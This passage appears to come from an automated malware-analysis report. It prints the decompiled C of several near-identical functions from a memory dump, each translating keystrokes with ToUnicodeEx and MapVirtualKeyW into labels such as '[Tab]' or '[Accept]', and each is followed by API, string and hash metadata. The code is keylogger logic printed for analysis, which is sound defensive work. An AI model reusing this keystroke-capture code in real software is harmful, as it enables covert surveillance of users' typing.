
APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
[Select], xrefs: 100072CE
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Select]
API String ID: 783433895-2413838692
Opcode ID: 514ff3e34b14a9e5d8ab413587dce2c2f410968874725fa2580441ff6d415804
Instruction ID: a17747a1b3028d12c7a4f27126b47fc81b0c71295ef6cb46dcdf9e05795c8619
Opcode Fuzzy Hash: 514ff3e34b14a9e5d8ab413587dce2c2f410968874725fa2580441ff6d415804
Instruction Fuzzy Hash: 1E31C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100072DD, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100072DD(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Separator]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100072dd
0x100072dd
0x100072e4
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Separator], xrefs: 100072DF

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Separator]
API String ID: 783433895-3494163826
Opcode ID: b28f82d1315a21c0ec3eeca5f420e7cb8781b37bf75afc05d08b2ace6efbe94e
Instruction ID: 4579c8cabb46fc9fc98fa56ae242cb9821b75e5cae476442ada672dc186bafb3
Opcode Fuzzy Hash: b28f82d1315a21c0ec3eeca5f420e7cb8781b37bf75afc05d08b2ace6efbe94e
Instruction Fuzzy Hash: A831C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100072FF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100072FF(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Numpad -]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100072ff
0x100072ff
0x10007306
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Numpad -], xrefs: 10007301

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Numpad -]
API String ID: 783433895-3603678833
Opcode ID: f727318df62ab6984be34b48274f61689c13b89c74ec8ef95ab27e6241858d3f
Instruction ID: b676ca2d17fe351d24fe2de8df4d6e9bb7385714fcd3c7b893a6d02882ec396e
Opcode Fuzzy Hash: f727318df62ab6984be34b48274f61689c13b89c74ec8ef95ab27e6241858d3f
Instruction Fuzzy Hash: D031C2B8F042545BF722C7658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45C761

Uniqueness

Uniqueness Score: -1.00%

Function 10007310, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007310(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Tab]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007310
0x10007310
0x10007317
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
[Tab], xrefs: 10007312
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Tab]
API String ID: 783433895-199360412
Opcode ID: a785524ab226e4e94283a726cfb6f81e18d137b6129507000f7a99f762322629
Instruction ID: 2d267a324e9484a07124ea1970936e27bf22569b5696d9d4b95596e51c586869
Opcode Fuzzy Hash: a785524ab226e4e94283a726cfb6f81e18d137b6129507000f7a99f762322629
Instruction Fuzzy Hash: 5C31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007321, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007321(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Zoom]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007321
0x10007321
0x10007328
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Zoom], xrefs: 10007323

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Zoom]
API String ID: 783433895-3055259814
Opcode ID: c86214f759ae3126244a3cd9606ceefeacbd963b4d36a47ee78664366667e26b
Instruction ID: c5f0f41a8bcff8c1d7aba9d7791743940dec5144013e653b87fb915418b11de3
Opcode Fuzzy Hash: c86214f759ae3126244a3cd9606ceefeacbd963b4d36a47ee78664366667e26b
Instruction Fuzzy Hash: 4331C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007332, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007332(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Accept]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007332
0x10007332
0x10007339
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Accept], xrefs: 10007334

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Accept]
API String ID: 783433895-902341990
Opcode ID: 061c268dcb76f09fc094880b4e13fa08ad57f8be8229b2d86ba77c075008c1be
Instruction ID: d2ccba2c791f0b7862c28547fcae4e8d4588ca6c664595fde746ffb7111930bd
Opcode Fuzzy Hash: 061c268dcb76f09fc094880b4e13fa08ad57f8be8229b2d86ba77c075008c1be
Instruction Fuzzy Hash: 7831C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECAB8EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007343, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007343(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Context Menu]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
